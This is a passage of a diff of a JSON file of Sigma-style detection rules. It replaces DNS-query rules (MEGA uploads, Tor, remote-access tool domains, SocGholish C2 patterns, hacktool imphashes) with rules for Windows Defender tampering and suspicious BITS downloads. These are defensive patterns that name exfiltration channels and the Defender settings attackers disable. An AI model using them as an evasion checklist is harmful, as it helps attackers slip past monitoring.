ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE 
'%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": 
"frack113", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "status": "experimental", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 
'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are 
commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Administrator might try to disable defender features during testing (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName 
LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "While the file extensions in question can be suspicious at times. 
It's best to add filters according to your environment to avoid large amount false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "title": "New BITS Job Created Via Bitsadmin", + "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "description": "Detects the creation of a new bits job by Bitsadmin", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Many legitimate applications or scripts could leverage \"bitsadmin\". 
This event is best correlated with EID 16403 via the JobID field" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_bits_client_new_job_via_bitsadmin.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "author": "frack113", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE 
'%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "New BITS Job Created Via PowerShell", + "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new bits job by PowerShell", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + 
"attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', 
'9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE 
